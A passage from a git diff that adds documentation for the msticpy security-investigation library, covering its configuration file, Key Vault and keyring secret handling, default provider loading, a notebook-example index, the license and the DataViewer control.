+example is the Threat Intelligence providers. Values for these
+and other parameters can be set in the `msticpyconfig.yaml` file.
+
+The package has a default configuration file, which is stored in the
+package directory. You should not need to edit this file directly.
+Instead you can create a custom file with your own parameters - these
+settings will combine with or override the settings in the default file.
+
+By default, the custom `msticpyconfig.yaml` is read from the current
+directory. You can specify an explicit location using an environment
+variable ``MSTICPYCONFIG``.
+
+You should also read the :doc:`MSTICPy Settings Editor <SettingsEditor>`
+document to see how to configure settings using and interactive User
+Interface from a Jupyter notebook.
+
+Configuration sections
+----------------------
+
+AzureSentinel
+~~~~~~~~~~~~~
+Here you can specify your default workspace and tenant IDs and add additional
+workspaces if needed.
+
+QueryDefinitions
+~~~~~~~~~~~~~~~~
+This allows you to specify paths to additional yaml query template files.
+
+TIProviders
+~~~~~~~~~~~
+This allows you to configure which providers are run by default and to
+supply any authorization keys needed to access the service.
+
+OtherProviders
+~~~~~~~~~~~~~~
+This section is similar to the TIProviders section, allowing you
+specify configuration options for specialist data providers.
+
+DataProviders
+~~~~~~~~~~~~~~
+This section is similar to the previous two sections, allowing you
+specify configuration options for other data providers.
+
+Key Vault
+~~~~~~~~~
+This section contains Azure Key Vault settings. This is only used if you
+choose to store secrets (e.g. API keys) in Key Vault.
+
+User Defaults
+~~~~~~~~~~~~~
+This section controls loading of default providers when using the
+package in a notebook. The settings here are loaded by the
+:py:func:`init_notebook <msticpy.nbtools.nbinit.init_notebook>`
+function.
+
+Specifying secrets as Environment Variables
+-------------------------------------------
+
+Some configuration values can be references to environment Variables
+rather than have a value explicitly stored within the configuration
+file. You might want secrets such as API keys to be supplied this
+way. The ``Args`` subsection of TIProvider and OtherProvider entries
+supports storing values as simple strings or as references to named
+environment variables. You can see examples of both in the sample
+file below.
+
+Specifying secrets as Key Vault secrets
+---------------------------------------
+
+*MSTICPy* can read secret values from Key Vault for use with TI and
+other providers. To use this you need to specify settings for your
+keyvault.
+
+.. code:: yaml
+
+    KeyVault:
+      TenantId: 5d6a50cf-b1b6-4bfd-ad54-b9822b06ff92
+      SubscriptionId: 40dcc8bf-0478-4f3b-b275-ed0a94f2c013
+      ResourceGroup: YourResourceGroup
+      AzureRegion: RegionToCreateKV
+      VaultName: "myvault"
+      UseKeyring: True
+      Authority: global
+      AuthnType: device
+
+Under the top level ``KeyVault`` section the following entries
+are accepted. Some of these are only required if you plan to
+use *MSTICPy* to create a new Key Vault vault.
+
+Required Settings
+~~~~~~~~~~~~~~~~~
+.. list-table::
+   :widths: 15, 30
+
+   * - TenantId
+     - the Identifier of your Azure tenant
+   * - VaultName
+     - the name of the vault to use (note this can be
+       overridden in the individual secret specifications
+   * - Authority
+     - this specifies the Azure cloud instance to use.
+
+For most users ``Authority`` is "global" (default). Other values are:
+- **usgov**: Azure US Government
+- **de**: German cloud
+- **chi**: China cloud
+
+Required to Create a Key Vault
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+.. list-table::
+   :widths: 15, 30
+
+   * - SubscriptionId
+     - the Azure subscription holding the Key Vault
+   * - ResourceGroup
+     - the Azure resource group in which to create the vault
+   * - AzureRegion
+     - the Azure region in which to create the vault
+
+Optional Settings
+~~~~~~~~~~~~~~~~~
+.. list-table::
+   :widths: 15, 30
+
+   * - UseKeyring
+     - if True (default) uses the Python keyring package
+       to securely cache Key Vault secrets in your client session.
+   * - VaultName
+     - the name of the vault to use (note this can be
+       overridden in the individual secret specifications)
+   * - AuthnType
+     - this governs the authentication type used by
+       the KeyVault client (to read and write secrets). The choices
+       are "interactive" for interactive browser authentication or
+       "device" for authentication using a user/device code. The
+       default is "interactive".
+
+.. note:: The ``AuthnType`` does not affect the authentication used by
+   the Key Vault **Management** client (the creation and enumeration
+   of vaults). This always uses device code authentication.
+
+Specifying Key Vault Secrets in Provider Settings
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+There are three ways to specify the Key Vault *vault* and *secret* names
+to use for a given setting.
+
+.. code:: yaml
+
+    TIProviders:
+
+      OpenPageRank:
+        Args:
+          AuthKey:
+            KeyVault:
+
+Adding an empty subkey named ``KeyVault`` will cause *MSTICPy* to generate
+a name for the secret,  built from the path of the setting. This is the default
+usage. In the example below,
+the secret name will be "TIProviders-OpenPageRank-Args-AuthKey".
+The vault name is taken from the setting in the ``KeyVault`` settings
+section.
+
+.. code:: yaml
+
+    OtherProviders:
+      IPStack:
+        Args:
+          AuthKey:
+            KeyVault: my_secret
+
+
+This example specifies "my_secret" as the secret name.
+The vault name is taken from the setting in the ``KeyVault`` settings
+section.
+
+.. code:: yaml
+
+    OtherProviders:
+      Contoso-GeopIp:
+        Args:
+          AuthKey:
+            KeyVault: my_vault/my_secret
+
+The final example specifies both a vault name and a secret name.
+The ``VaultName`` setting in the ``KeyVault`` section is ignored
+for this setting.
+
+Populating Key Vault secrets from an existing msticpyconfig.yaml
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can use the *MSTICPy* settings editor to upload secrets to
+a Key Vault one-by-one. This is described in in the in the
+:ref:`Key Vault Secrets <getting_started/SettingsEditor:key vault secrets>`
+section of *MSTICPy* Settings Editor document.
+
+
+There is also a command line tool to move your secrets to Key Vault -
+``config2ky.py``. This tool is available in the *MSTICPy* GitHub repo.
+You can find it in the ``tools`` folder.
+
+Running ``config2kv.py --help`` shows the usage of this utility.
+
+The simplest way to use this tool is to populate your existing
+secrets as strings in your ``msticpyconfig.yaml``. (as shown in
+some of the provider settings in the example at the end of this
+page).
+
+You can specify this as the input file using the ``--path`` parameter.
+Alternatively, the tool will look for a msticpyconfig.yaml in the
+location specified by the ``MSTICPYCONFIG`` environment variable.
+
+Create a ``KeyVault``
+configuration section in the file, supplying the values described
+earlier. If you already have a vault that you want to use, put
+the name of the vault in the ``VaultName`` setting and run
+``config2kv.py`` with the ``--exists`` parameter. This will bypass
+the Key Vault Management client section and the extra authentication
+step that this requires. If you do not have a vault or wish to
+create a new one, omit the ``--exists`` parameter and you will
+be prompted to create one.
+
+The tool will read secrets and create secret names based on the
+path of the secret (as described above).
+
+.. warning:: ``config2ky`` will only read and convert
+   items in the provider ``Args`` sections. Currently, only
+   ``ApiID`` and ``AuthKey`` values will be used.
+
+The tool will then write the
+secret values to the vault. Finally a replacement ``msticpyconfig.yaml``
+is written to the location specified in the ``--path`` argument.
+You can then delete or securely store your old configuration file
+and replace it with the one output by ``config2kv``.
+
+.. tip:: you can run ``config2ky`` with the ``--show`` parameter to
+   perform a rehearsal. This will show you the Key Vault secrets
+   that will be created and show the text of the msticpyconfig.yaml
+   file that would have been created.
+
+
+Using **keyring** to cache secrets
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+**keyring** is available on most Python platforms: Windows, Linux
+and MacOS. On Linux it requires the installation of optional
+components - either KWallet or Secret Service. See the
+`Keyring Readme <https://github.com/jaraco/keyring>`__ for more
+information.
+
+.. warning:: *keyring* caching is enabled by default. If you are working
+   in an environment that does not have one of the supported *keyring*
+   backends installed you should disable keyring caching by adding
+   ``Keyring: false`` to you configuration settings.
+
+The advantage of using *keyring* is that you do not need to re-authenticate
+to Key Vault for each notebook that you use in each session. If you
+have ``UseKeyring: true`` in your ``msticpyconfig.yaml`` file, the
+first time that you access a Key Vault secret the secret value is
+stored as a keyring password with the same name as the Key Vault secret.
+
+Unfortunately, the *keyring* package provides no way to list or delete stored
+secrets. If you need to remove the locally-stored secrets use the platform
+utility for the appropriate backend. For example, on Windows, ``cmdkey``
+lets you list and manipulate local stored credentials.
+
+.. warning:: *keyring* secrets are not automatically synchronized
+   with the Key Vault secret values. If you change the value of a
+   secret in Key Vault you must delete the keyring secret so that
+   the new value will be re-read from Key Vault.
+
+
+Manually managing your Key Vault secrets
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can use the Azure portal to create and manage your secrets. If you
+prefer to do this, simply enter the name of the secret in the
+corresponding section for the AuthKey or ApiID of your providers.
+
+You can also use powershell or Python to manage these programmatically.
+*MSTICPy* has some convenience wrappers around the Azure SDK functions.
+
+The documentation for these is available here:
+:py:mod:`keyvault_client<msticpy.common.keyvault_client>`
+:py:mod:`secrets_settings<msticpy.common.secrets_settings>`
+
+
+User Defaults Section
+---------------------
+
+This section specifies the query and other providers that you want
+to load by default. It is triggered from the
+:py:func:`init_notebook<msticpy.nbtools.nbinit.init_notebook>`
+although you can call the
+:py:func:`load_user_defaults<msticpy.nbtools.user_config.load_user_defaults>`
+function to do this manually.
+
+If you do not have this section in your configuration ``init_notebook`` will
+bypass auto-loading any components.
+
+
+QueryProviders
+~~~~~~~~~~~~~~
+
+This is a list of query providers that you want to load. Most of the
+providers have a single namespace/environment associated with them but in
+the case of Azure Sentinel, you can load multiple copies of the query
+provider for different workspaces. The example below shows three different
+formats that you can used. Each workspace name under ``QueryProviders``
+must exist as a workspace definition in the AzureSentinel section of this
+file (see `Commented configuration file sample`_ below)
+
+.. note:: Single-string entries in this and other sections (e.g.
+   ``MyWorkspace:`` below) must be specified as empty dictionaries. This
+   is done by adding a trailing ":" to the entry but no value on the other
+   side of the colon. This is simply to make the settings parsing code
+   a little easier. This is only when you are specifying a setting key -
+   i.e. the first item on a line. The *key values* ("azsent", "sco" and
+   "False" in this example) should be entered without a trailing colon.
+
+   Note also that False is a boolean value, not a string. You should
+   always enter True and False with proper capitalization.
+
+.. code:: yaml
+
+    UserDefaults
+      QueryProviders:
+        AzureSentinel:
+          MyWorkspace:
+          Default:
+            alias: azsent
+          CyberSoc:
+            alias: soc
+            connect: False
+
+``MyWorkspace`` is loaded as-is - equivalent to calling:
+
+.. code:: ipython3
+
+    from msticpy.data import QueryProvider
+    from msticpy.common.wsconfig import WorkspaceConfig
+
+    qry_myworkspace = QueryProvider("AzureSentinel")
+    ws_config = WorkspaceConfig(workspace="MyWorkspace")
+    qry_myworkspace.connect(ws_config.code_connect_str)
+
+The ``Default`` entry has a few differences. The name "Default" refers
+to the default workspace definition in the AzureSentinel section of
+the msticpyconfig file. The ``alias: azsent`` element is an alias that will be used
+to rename the provider. It is equivalent to the following code:
+
+.. code:: ipython3
+
+    from msticpy.data import QueryProvider
+    from msticpy.common.wsconfig import WorkspaceConfig
+
+    qry_azsent = QueryProvider("AzureSentinel")
+    ws_config = WorkspaceConfig()
+    qry_azsent.connect(ws_config.code_connect_str)
+
+The final ``CyberSoc`` entry has multiple key-value pairs under it.
+The "alias" entry works exactly the same as the previous example.
+The "connect" item tells the code not to automatically connect
+(authenticate) to Azure Sentinel. It is equivalent to the following
+code:
+
+.. code:: ipython3
+
+    from msticpy.data import QueryProvider
+
+    qry_soc = QueryProvider("AzureSentinel")
+
+In all three cases the query provider object (``qry_soc`` in the last
+example) is stored in the global namespace of the notebook so you
+can always refer to it using this variable name.
+
+Query providers for non-Azure Sentinel data sources use the same
+syntax for aliasing and suppressing connect/authenticate. For
+example:
+
+.. code:: yaml
+
+    UserDefaults
+      QueryProviders:
+        AzureSentinel:
+          ...
+        Splunk:
+          connect: false
+        LocalData:
+          alias: local
+
+LoadComponents
+~~~~~~~~~~~~~~
+
+This section controls the loading and instantiation of a number
+of other data providers and components.
+
+.. code:: yaml
+
+    UserDefaults
+      ...
+      LoadComponents:
+        TILookup:
+        GeoIpLookup:
+          provider: GeoLiteLookup
+        Notebooklets:
+          query_provider:
+            AzureSentinel:
+              workspace: CyberSoc
+        Pivot:
+        AzureData:
+          auth_methods=['cli','interactive']
+        AzureSentinelAPI:
+
+Some of these accept additional parameters and some do not. Most
+of the configuration parameters for GeoIP providers, for example,
+are loaded from other sections of the configuration file.
+
+``GeoIpLookup`` - requires one parameter - the name of the ``provider``
+that you want to use for GeoIP location resolution.
+
+``TILookup`` - no parameters, simply creates an instance of TILookup
+using the settings in the ``TIProviders`` section.
+
+``Notebooklets`` - to use this you must have MSTIC Notebooklets (msticnb
+see `MSTICNB documentation <https://msticnb.readthedocs.io>`__). This
+has a required configuration setting, which *MSTICPy* passes to the
+notebooklets init function as the ``query_provider`` parameter. Other
+key/pair values included under the "query_provider" key are passed to
+the notebooklets initialization. Each parameter name is prefixed with
+the provider name so that it knows which parameters to send to which
+provider. In the example above notebooklets ``nbinit`` would be passed
+the following parameters:
+
+.. code:: ipython3
+
+    nbinit(query_provider="AzureSentinel", AzureSentinel_workspace="CyberSoc")
+
+
+The notebooklets
+package is loaded after most of the other providers (but before Pivot if that
+is included in the list) and is also sent the names of other
+providers (query and others such as TILookip) as its ``providers`` parameter.
+For more details see
+`data_providers.init <https://msticnb.readthedocs.io/en/latest/msticnb.html#msticnb.data_providers.init>`__.
+
+``Pivot`` loads the Pivot library to add pivot functions to *MSTICPy* entities.
+It requires other providers to be loaded before itself (in order to
+harvest the pivot functions from them) so it is loaded last.
+
+``AzureData`` and ``AzureSentinel`` load the Azure resource API and Azure
+Sentinel API libraries respectively. Any key/pair values defined under either
+of these entries are passed to the provider ``connect`` method. In the
+AzureData example above this is equivalent to the following code.
+
+
+.. code:: ipython3
+
+    from msticpy.data.azure_data import AzureData
+    az_data = AzureData()
+    az_data.connect(auth_methods=['cli','interactive'])
+
+The components in the LoadProviders section have built-in friendly
+names for each component. These currently cannot be overridden from the
+configuration settings:
+
+- geoip
+- ti_lookup
+- nb
+- pivot
+- az_data
+- azs_api
+
+
+*MSTICPy* current_providers Attribute
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you have loaded providers using the UserDefaults configuration the
+provider instances created are also stored in an attribute of the
+``msticpy`` top level module.
+
+
+.. code:: ipython3
+
+    >>> msticpy.current_providers
+
+    {'qry_azsent': <msticpy.data.data_providers.QueryProvider at 0x21604110ac8>,
+    'qry_myworkspace': <msticpy.data.data_providers.QueryProvider at 0x216041459c8>,
+    'qry_cybersoc': <msticpy.data.data_providers.QueryProvider at 0x21660d41308>,
+    'qry_splunk': <msticpy.data.data_providers.QueryProvider at 0x21661127208>,
+    'qry_local': <msticpy.data.data_providers.QueryProvider at 0x216605a7c48>,
+    'ti_lookup': <msticpy.sectools.tilookup.TILookup at 0x216611c7908>,
+    'geoip': <msticpy.sectools.geoip.GeoLiteLookup at 0x21660659c88>,
+    'pivot': <msticpy.datamodel.pivot.Pivot at 0x216602d8e88>,
+    'az_data': <msticpy.data.azure_data.AzureData at 0x21668aaf708>,
+    'azs_api': <msticpy.data.azure_sentinel.AzureSentinel at 0x21603f42388>,
+    'nb': <module 'msticnb' from 'e:\\src\\msticnb\\msticnb\\__init__.py'>}
+
+
+You can use this to reference any of these loaded components. Although
+these values are normally also populated in the notebook global namespace
+you can re-populate them if needed. To write them
+back into the notebook namespace execute the following:
+
+.. code:: ipython3
+
+    >>> globals().update(msticpy.current_providers)
+
+
+.. warning:: This will overwrite any global variable with the same name as
+   any of the items in the ``current_providers`` dictionary.
+
+
+Extending msticpyconfig.yaml
+----------------------------
+
+You can also extend msticpyconfig to include additional sections to
+support other authentication and configuration options such as MDATP
+API connections. Refer to documentation on these features for required
+structures.
+
+Settings are read by the
+:py:mod:`refresh_config<msticpy.common.pkg_config>` module.
+Combined settings are available as the ``settings`` attribute of this
+module. Default settings and custom settings (the settings that you
+specify in your own msticpyconfig.yaml) also available separately in
+the ``default_settings`` and ``custom_settngs`` attributes, respectively.
+
+To force settings to be re-read after the package has been imported,
+call :py:func:`refresh_config<msticpy.common.pkg_config.refresh_config>`.
+
+The settings exposed in these attributes are python dictionaries that
+reflect the underlying YAML data in the configuration file.
+
+.. note:: the :py:mod:`~msticpy.common.wsconfig` module, TIProviders,
+   OtherProviders and the data libraries use additional functionality
+   to provide higher-level views of the configuration data. An example
+   of this is the using environment variable references to replace
+   the actual configuration value with the secret stored in the
+   environment variables.
+
+
+Commented configuration file sample
+-----------------------------------
+
+
+.. code:: yaml
+
+    AzureSentinel:
+      Workspaces:
+        # Workspace used if you don't explicitly name a workspace when creating WorkspaceConfig
+        # Specifying values here overrides config.json settings unless you explictly load
+        # WorkspaceConfig with config_file parameter (WorkspaceConfig(config_file="../config.json")
+        Default:
+          WorkspaceId: "d973e3d2-28e6-458e-b2cf-d38876fb1ba4"
+          TenantId: "4cdf87a8-f0fc-40bb-9d85-68bcf4ac8e61"
+        # To use these launch with an explicit name - WorkspaceConfig(workspace_name="Workspace2")
+        Workspace2:
+          WorkspaceId: "c88dd3c2-d657-4eb3-b913-58d58d811a41"
+          TenantId: "f1f64e65-ff7c-4d71-ad5b-091b6ab39d51"
+        Workspace3:
+          WorkspaceId: "17e64332-19c9-472e-afd7-3629f299300c"
+          TenantId: "4ea41beb-4546-4fba-890b-55553ce6003a"
+    UserDefaults:
+      # List of query providers to load
+      QueryProviders:
+        - AzureSentinel:
+          - Default: asi
+          - CyberSoc:
+            alias: soc
+            connect: false
+        - Splunk:
+            connect: false
+        - LocalData: local
+      # List of other providers/components to load
+      LoadComponents:
+        - TILookup
+        - GeoIpLookup: GeoLiteLookup
+        - Notebooklets:
+            query_provider:
+              AzureSentinel: CyberSoc
+        - Pivot
+        - AzureData:
+          auth_methods=['cli','interactive']
+        - AzureSentinelAPI
+    QueryDefinitions:
+      # Add paths to folders containing custom query definitions here
+      Custom:
+        - /var/global-queries
+        - /home/myuser/queries
+        - c:/users/myuser/documents
+    TIProviders:
+      # If a provider has Primary: True it will be run by default on IoC lookups
+      # Secondary providers can be
+      OTX:
+        Args:
+          AuthKey: "4ea41beb-4546-4fba-890b-55553ce6003a"
+        Primary: True
+        Provider: "OTX" # WARNING - Do not change Provider values!
+      VirusTotal:
+        Args:
+          AuthKey: "4ea41beb-4546-4fba-890b-55553ce6003a"
+        Primary: False
+        Provider: "VirusTotal"
+      XForce:
+        # You can store items in an environment variable using this syntax
+        Args:
+          ApiID:
+            EnvironmentVar: "XFORCE_ID"
+          AuthKey:
+            EnvironmentVar: "XFORCE_KEY"
+        Primary: True
+        Provider: "XForce"
+      AzureSentinel:
+        # Note this can be a different workspace/tenant from your main workspace
+        # This only controls where the Azure Sentinel TI provider looks for the
+        # ThreatIndicator table.
+        Args:
+          WorkspaceID: "c88dd3c2-d657-4eb3-b913-58d58d811a41"
+          TenantID: "f1f64e65-ff7c-4d71-ad5b-091b6ab39d51"
+        Primary: True
+        Provider: "AzSTI"
+      OpenPageRank:
+        Args:
+          AuthKey:
+            KeyVault:
+        Primary: False
+        Provider: "OPR"
+      TorExitNodes:
+        Primary: True
+        Provider: "Tor"
+      RiskIQ:
+        Args:
+          ApiID: "user@host.com"
+          AuthKey: "aaaa-bbbb-cccc-dddd-eeee"
+        Provider: "RiskIQ"
+        Primary: True
+    OtherProviders:
+      GeoIPLite:
+        Args:
+          AuthKey:
+            EnvironmentVar: "MAXMIND_AUTH"
+          DBFolder: "~/.msticpy"
+        Provider: "GeoLiteLookup"
+      IPStack:
+        Args:
+          AuthKey:
+            KeyVault: my_secret
+        Provider: "IPStackLookup"
+      Contoso-GeopIp:
+        Args:
+          AuthKey:
+            KeyVault: my_vault/my_secret
+        Provider: "ContosoLookup"
+    DataProviders:
+      AzureCLI:
+        Args:
+          clientId: "69d28fd7-42a5-48bc-a619-af56397b1111"
+          tenantId: "69d28fd7-42a5-48bc-a619-af56397b2222"
+          clientSecret: "69d28fd7-42a5-48bc-a619-af56397b3333"
+
+
+See also
+--------
+
+:doc:`The Threat Intelligence Providers documention <../data_acquisition/TIProviders>`
+
+:py:mod:`wsconfig<msticpy.common.wsconfig>`
+:py:mod:`provider_settings<msticpy.common.provider_settings>`
+:py:mod:`wsconfig<msticpy.common.pkg_config>`
diff --git a/docs/source/index.rst b/docs/source/index.rst
new file mode 100644
index 000000000..e29667387
--- /dev/null
+++ b/docs/source/index.rst
@@ -0,0 +1,85 @@
+MSTIC Jupyter and Python Security Tools
+=======================================
+
+
+**msticpy** is a library for InfoSec investigation and hunting
+in Jupyter Notebooks. It includes functionality to:
+
+* query log data from multiple sources
+* enrich the data with Threat Intelligence, geolocations and Azure
+  resource data
+* extract Indicators of Activity (IoA) from logs and unpack encoded data
+* perform sophisticated analysis such as Anomalous session detection and
+  time series decomposition
+* visualize data using interactive timelines, process trees and
+  multi-dimensional Morph Charts
+
+It also includes some time-saving notebook tools such as widgets to
+set query time boundaries, select and display items from lists, and
+configure the notebook environment.
+
+.. figure:: visualization/_static/Timeline-08.png
+   :alt: Timeline with reference marker
+
+Background - Why we created *msticpy*
+-------------------------------------
+
+The package was originally built for authoring notebooks in
+`Azure Sentinel <https://azure.microsoft.com/services/azure-sentinel/>`__.
+While Azure Sentinel is still a big focus of our work, we are
+have extended the data query/acquisition components to pull log data from
+other sources (e.g. Splunk, Microsoft 365 Defender and Microsoft Graph,
+SumoLogic, and
+are actively working on support for data from other SIEM platforms).
+Most of the components can also be used with data from any source. Pandas
+dataframes are used as the ubiquitous input and output format of almost
+all components.
+
+Most of the content of the package began life as inline code in a
+notebook. However, having a lot of code in your notebooks creates
+a few problems:
+
+* notebooks dominated by big code blocks make it difficult to see
+  the results and text of your notebook - which is really what you
+  want your audience to see
+* it makes the notebook especially intimidating for non-programmers
+* it makes code re-use very hard.
+
+The philosophy behind this package is to create a repository for
+re-usable pieces of functionality that make it both quicker to author
+notebooks, and make resultant notebooks easier to read.
+
+What is/who are MSTIC?
+^^^^^^^^^^^^^^^^^^^^^^
+
+MSTIC == Microsoft Threat Intelligence Center. We are mostly security
+analysts and  engineers working on:
+
+* authoring security detections for several Microsoft platforms
+* threat identification and investigation
+
+Contents
+========
+
+.. toctree::
+   :maxdepth: 3
+
+   GettingStarted
+   DataAcquisition
+   DataEnrichment
+   DataAnalysis
+   Visualization
+   msticpyAPI
+   notebooksamples
+   blog_articles
+   Releases
+   contributing
+   license
+
+
+Indices and tables
+==================
+
+* :ref:`genindex`
+* :ref:`modindex`
+* :ref:`search`
diff --git a/docs/source/license.rst b/docs/source/license.rst
new file mode 100644
index 000000000..d45e8a454
--- /dev/null
+++ b/docs/source/license.rst
@@ -0,0 +1,23 @@
+License
+=======
+
+msticpy Copyright (c) Microsoft Corporation. All rights reserved.
+
+MIT License Permission is hereby granted, free of charge, to any person
+obtaining a copy of this software and associated documentation files
+(the "Software"), to deal in the Software without restriction, including 
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to permit
+persons to whom the Software is furnished to do so, subject to the following
+conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/docs/source/msticpyAPI.rst b/docs/source/msticpyAPI.rst
new file mode 100644
index 000000000..718987d97
--- /dev/null
+++ b/docs/source/msticpyAPI.rst
@@ -0,0 +1,8 @@
+msticpy API
+===========
+
+.. toctree::
+    :maxdepth: 4
+
+    api-how-to-read
+    api/msticpy
diff --git a/docs/source/notebooksamples.rst b/docs/source/notebooksamples.rst
new file mode 100644
index 000000000..a24de2317
--- /dev/null
+++ b/docs/source/notebooksamples.rst
@@ -0,0 +1,49 @@
+
+Notebook Examples
+=================
+
+See the following notebooks for examples of the use of this package
+in practice:
+
+Data
+----
+
+- `Data Queries <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Data_Queries.ipynb>`__
+- `MDE Queries <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/MDATPQuery.ipynb>`__
+- `Splunk Data <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Splunk-DataConnector.ipynb>`__
+- `Azure Storage <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/AzureBlobStorage.ipynb>`__
+- `Mordor Data <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/MordorData.ipynb>`__
+- `SQL to KQL conversion Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/SqlToKql.ipynb>`__
+
+Enrichment
+----------
+
+- `Threat Intel Providers Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb>`__
+- `GeoIP Lookup Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/GeoIPLookups.ipynb>`__
+- `VirusTotal Lookup Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/VirusTotalLookup.ipynb>`__
+- `VirusTotal V3 API <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/VTLookupV3.ipynb>`__
+- `Azure Sentinel API <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/AzureSentinelAPIs.ipynb>`__
+
+Analysis
+--------
+
+- `Anomalous Sequence Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/AnomalousSequence.ipynb>`__
+- `Time Series Anomalies Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TimeSeriesAnomaliesVisualization.ipynb>`__
+- `Event Clustering Tree Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventClustering.ipynb>`__
+- `Base64Unpack Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Base64Unpack.ipynb>`__
+- `IoCExtract Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/IoCExtract.ipynb>`__
+- `Pivot Functions <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/PivotFunctions.ipynb>`__
+- `Pivot Functions Intro <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/PivotFunctions-Introduction.ipynb>`__
+
+Visualization and Tools
+-----------------------
+
+- `Notebooks Widgets and Tools <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/NotebookWidgets.ipynb>`__
+- `Event Timeline Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventTimeline.ipynb>`__
+- `Process Tree Notebook Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/ProcessTree.ipynb>`__
+- `Folium Geo-map Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/FoliumMap.ipynb>`__
+
+Configuration
+-------------
+
+- `MSTICPy Settings editor <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/MPSettingsEditor.ipynb>`__
\ No newline at end of file
diff --git a/docs/source/redirects b/docs/source/redirects
new file mode 100644
index 000000000..ee0189e4d
--- /dev/null
+++ b/docs/source/redirects
@@ -0,0 +1,5 @@
+JupyterAndAzureSentinel.rst getting_started/JupyterAndAzureSentinel.rst
+JupyterAndSecurity.rst getting_started/JupyterAndSecurity.rst
+msticpyconfig.rst getting_started/msticpyconfig.rst
+TIProviders.rst data_acquisition/TIProviders.rst
+EventTimeline.rst visualization/EventTimeline.rst
\ No newline at end of file
diff --git a/docs/source/visualization/DataViewer.rst b/docs/source/visualization/DataViewer.rst
new file mode 100644
index 000000000..2afbfa1e2
--- /dev/null
+++ b/docs/source/visualization/DataViewer.rst
@@ -0,0 +1,231 @@
+Data Viewer
+===========
+
+This describes the use of the
+:py:class:`DataViewer<msticpy.nbtools.data_viewer.DataViewer>`
+control.
+
+DataViewer uses the Bokeh DataTable control to provide some basic
+data manipulation features for viewing pandas DataFrames
+more easily:
+
+- Scrollable data viewer taking a fixed amount of the output cell
+- Sorting data by column
+- Column selection
+- Data filtering
+
+
+There is also a `notebook with the contents of this document
+<https://github.com/microsoft/msticpy/blob/master/docs/notebooks/DataViewer.ipynb>`__
+
+Use the DataViewer to display a DataFrame
+-----------------------------------------
+
+To view a DataFrame in the viewer just pass the DataFrame as
+the `data` parameter.
+
+.. code:: ipython3
+
+    from msticpy.nbtools.data_viewer import DataViewer
+    import pandas as pd
+
+    # data is a pandas DataFrame
+    DataViewer(data)
+
+
+.. figure:: _static/DataViewer.png
+   :alt: Simple use of the data viewer showing the tabular dataframe.
+
+
+Specify an initial set of columns
+---------------------------------
+
+You can start the viewer with a restricted set of columns by
+passing a list of column names as the `selected_columns`
+parameter
+
+.. code:: ipython3
+
+    columns = [
+        "Account",
+        "EventID",
+        "TimeGenerated",
+        "Computer",
+        "NewProcessName",
+        "CommandLine",
+        "ParentProcessName",
+    ]
+    DataViewer(data, selected_cols=columns)
+
+
+
+
+Sorting the data by a column
+----------------------------
+
+Click on a column heading to sort the displayed data by that
+column. Click again on the same column header to sort in
+reverse order.
+
+.. figure:: _static/dataviewer_column_sort.png
+    :alt: Sort data by clicking on the column header.
+
+
+Choosing which columns to display
+---------------------------------
+
+The right side list contains the available columns in the DataFrame, the
+left side is the list of columns to display.
+
+Use the **Add**/**Remove** buttons (1 in the screen shot below) to
+add or remove columns from the selected
+set. You can select multiple columns using Ctrl+Click or Shift+Click
+(the former selects or deselects an item for each click, the latter
+selects a range of items between the last item selected and the
+currently-clicked item).
+
+Click on **Apply columns** (2 in the screen shot) to update the data view.
+
+.. code:: ipython3
+
+    viewer = DataViewer(data, selected_cols=columns)
+
+
+.. figure:: _static/dataviewer_choose_columns.png
+    :alt: Selecting which columns to display using the Choose columns drop-down.
+
+
+
+Filtering the data
+------------------
+
+You can apply multiple filters - each filter is additive, i.e. each is
+logically AND-ed with the others.
+
+The **Filter data** drop down shows the following controls:
+
+Filter expression
+^^^^^^^^^^^^^^^^^
+
+- *Column selector* drop-down - which column you want the filter to apply to
+- *Not* checkbox - invert the logic of the filter (for this filter item only)
+- *Operator* drop-down - the available operators are different for string
